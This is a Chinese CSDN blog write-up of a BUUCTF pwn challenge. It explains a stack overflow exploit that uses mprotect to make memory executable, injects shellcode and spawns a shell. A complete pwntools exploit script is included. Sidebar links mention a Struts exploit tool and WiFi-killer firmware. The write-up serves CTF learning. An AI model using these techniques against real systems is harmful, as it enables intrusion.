pwn刷题num34---mprotect修改内存权限 + ret2shellcode

最新推荐文章于 2024-01-24 22:14:54 发布
最新推荐文章于 2024-01-24 22:14:54 发布
阅读量1.9k 收藏 4
点赞数
分类专栏: BUUCTF pwn CTF 文章标签: 系统安全 网络安全 linux c语言 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124481045
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏

BUUCTF-PWN-not_the_same_3dsctf_2016

在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行

在这里插入图片描述

32位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
静态链接

ida一下
在这里插入图片描述
gets函数明显的栈溢出,v4只有0x2D大小,gets函数对输入的字符串没有大小限制
看一下栈区
在这里插入图片描述
v4距离返回地址(r所在位置)0x2d个字节
找一下有没有后门函数,发现没有system函数,也没有/bin/sh字符串,而且是静态链接,也没法用ret2libc
既然是静态链接,而且题目开启了NX保护,又要用mprotect函数来修改权限了
关于mprotect函数的用法详见我另一篇文章
pwn刷题num30----栈溢出修改栈上参数 或 mprotect修改内存权限 + ret2shellcode

思路

用gets函数栈溢出,用mprotect函数修改.plt.got表内存页权限为可读可写可执行,用read函数将shellcode注入到刚才修改的内存页中,执行shellcode
还要找到含有三个寄存器的gadget段传递参数,这里选0x0809e3e5

在这里插入图片描述

exp

from pwn import *
context(log_level = 'debug',os = 'linux',endian = 'little',arch = 'i386')
sh = remote('node4.buuoj.cn',28489)
elf = ELF('./not_the_same_3dsctf_2016')
mprotect = 0x806ED40
pop3_ret = 0x0809e3e5
addr = 0x080EB000
read = elf.symbols['read']
shellcode = asm(shellcraft.sh(),arch='i386',os='linux')
payload = flat(['a' * 0x2d,mprotect,pop3_ret,addr,0x100,0x7,read,addr,0,addr,len(shellcode)])
sh.sendline(payload)
sh.sendline(shellcode)
sh.interactive()

在这里插入图片描述

在这里插入图片描述

tbsqigongzi
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
内存越界定位】mprotect
叮咚的博客
08-15 904
mprotect()函数可以修改调用进程内存页的保护属性,如果调用进程尝试以违反保护属性的方式访问该内存,则内核会发出一个SIGSEGV信号给该进程。 函数介绍 头文件:#include <sys/mman.h> 函数定义: int mprotect(void *addr, size_t len, int prot); 入参: addr:内存地址要求是一个内存页的首地址,简而言之为页大小(一般是 4KB == 4096字节)整数倍。 len:被修改保护属性区域的长度,页大小整数倍。修改
pwnnum30----栈溢出修改栈上参数 或 mprotect修改内存权限 + ret2shellcode
tbsqigongzi的博客
04-27 1944
BUUCTF-PWN-get_started_3dsctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表仍可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 静态链接 Qual a palavrinha magica? 中文意思是 什么是神奇的词? 很奇怪,ida看一下伪代码 栈溢出,gets函数输入字符串给v4,未限制输入的
get_started_3dsctf_2016 | PWN | BUUCTF | mprotect函数
Dem1的博客
04-16 203
【声明:我不会做,所以学习别人的看看能不能看懂】 from pwn import * context(arch='i386',os='linux') r=remote('node4.buuoj.cn',29114) elf=ELF('./get_started_3dsctf_2016') mprotect_addr=elf.symbols['mprotect'] read_addr=elf.symbols['read'] main_addr=elf.symbols['main'] ppp3_addr=0x
pwn入门之mprotect函数的利用
最新发布
wangxunyu6的博客
01-24 1162
所以payload的意思就是先调用mprotect函数通过pop将原本的参数覆盖为我们想要的参数,然后返回到read函数,然后pop弹掉read的参数,把第二个参数改为bss的地址,读入shellcode。通过gadget找到一个含有三个pop一个ret指令的地址,我们要通过这个指令将mprotect函数原来的参数pop走,让我们能够填入我们想要的参数.pop_ebx_esi_ebp_ret=0x80a019b然后就是构造payload了先上代码。这是64位的所以着重讲一下pay的构造。
BJD3rd(DASCTF) pwn部分目整理 (oj, stack_chk_fail, __libc_csu_fini, mprotect, init, orw,汇编)
carol2358的博客
05-26 1494
TaQiniOJ-0 #include “/home/ctf/fl ag”@Y Memory Monster I 有canary,利用触发canary时的__stack_chk_fail和目的任意地址任意写,改写__stack_chk_fail为backdoor exp: from pwn import * from LibcSearcher import * local_file = './Memory_Monster_I' local_libc = '/lib/x86_64-li...
ret2shellcode
qq_45691294的博客
12-18 4618
shellcode的含义: 在栈溢出的攻击技术中通常是要控制函数的返回地址到自己想要的地方执行自己想要执行的代码。ret2shellcode代表返回到shellcode中即控制函数的返回地址到预先设定好的shellcode区域中去执行shellcode代码,这是非常危险的。 这里学习一下shellcode的利用方式,用ret2shellcode作为例 先用checksec查看一下保护,可以看到,没有开启任何保护机制,且是一个32位的程序 使用IDA分析程序,只发现了主函数,并没有发现后门函数 get
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn shellcode 变形shellcode练手目,该目主要是利用三个节点来注入shellcode,考验解人对shellcode的熟悉程度。解:https://blog.csdn.net/A951860555/article/details/110350773
PWN-shellcode-WP- (一)目文件.rar
03-29
为几道搜集的真,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Linux内存mprotect读写,mprotect笔记
weixin_39746382的博客
05-03 726
用户态mprotect的定义int mprotect(const void *addr, size_t len, int prot);其中:addr --- 起始地址len ----addr开始的一块内存的大小prot ---- 期望设置的内存属性,取值是PROT_READ, PROT_WRITE, PROT_EXEC, PROT_NONE 这些bit的组合SYSCALL_DEFINE3(...
Linux内存mprotect读写,linux mprotect 修改用户态内存的方法
weixin_28839549的博客
05-03 1163
一.简述:linux内核有时候需要修改用户态的内存,或者从用户态拷贝数据。由于linux内核态和用户态内存有各自的分区,不能相互直接访问,所以:当用户态态需要访问内核数据时,需要在内核用copy_to_user来吧内核数据拷贝到用户态当内核态需要访问用户态数据时,用copy_from_user来拷贝用户数据到内核。copy_to_user实质就是修改用户态的内存,但有时候需要修改用户态非可写的内存...
静态编译:Mprotect、自动化rop链;Ret2csu
2301_79880752的博客
01-24 1085
开启NX,64位,IDA分析:看左半边不难看出这是一道静态编译(简单解释,左边函数很多,静态编译占内存一般比动态多的多右半边可以看到,只有一个gets函数可以利用(存在栈溢出由于这是静态编译,因此我们可以有多种写法,这里我们分别使用Mprotect与自动化rop链解
Linux下查看内存使用状况的命令:free -h
JoggingPig的博客
08-19 2014
total:指一共有多少内存; used:正在被使用的内存; free:完全空闲中的内存; shared:共享内存(无实际用处?) buffer/cache:缓存缓冲内存; available:真实可用的内存; cache(内存中的高速缓存)的作用:提高cpu读取数据的速度;(访内存比访问外存花费时间少,划分部分内存作为缓存区,提高性能---高效率的读) buffer(内存中的缓冲区):为了提高写硬盘的速度;(高效率的写) 参考书籍:运维手册 ...
xman-level5-mprotect利用
playmaker的博客
06-07 755
xman-level5 目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本 无法用system和execve函数,只能通过shellcode来进行getshell。 但是开了NX保护。不可以执行shellcode 但是目给了提示使用mmap函数和mprotect。 我们可以使用mprotect 函数,将bss段改为可...
缓冲区溢出-基本ROP-ret2shellcode
weixin_33950035的博客
04-16 583
本文视频: 如果文字过于枯燥,可观看在线视频:https://edu.51cto.com/sd/16514基础知识: ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一...
Android加壳过程中mprotect调用失败的原因及解决方案
云守护的专栏
09-15 1549
原由 函数抽取壳是当前最为流行的DEX加壳方式之一,这种加壳方式的主要流程包含两个步骤:一、将DEX中需要保护的函数指令置空(即抽取函数体);二、在应用启动的过程中,HOOK 类的加载过程,比如ClassLinker::LoadMethod函数,然后及时回填指令。 笔者在实现抽取壳的过程中遇到了一个问,即在步骤二回填指令之前,需要先调用mprotect将目标内存设置为“可写”,但在初次尝试过程中一直调用失败,于是有了今天这篇文章。 本文探讨的主要内容是mprotect调用失败的根本原因,以及
linux编程之mprotect
云计算?
11-06 617
mprotect: 设置内存访问权限 mmap 的第三个参数指定对内存区域的保护,由标记读、写、执行权限的 PROT_READ、PROT_WRITE 和 PROT_EXEC 按位与操作获得,或者是限制没有访问权限的 PROT_NONE。如果程序尝试在不允许这些权限的本地内存上操作,它将被 SIGSEGV 信号(Segmentation fault,段错误)终止。 在内存映射完成后,这些...
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值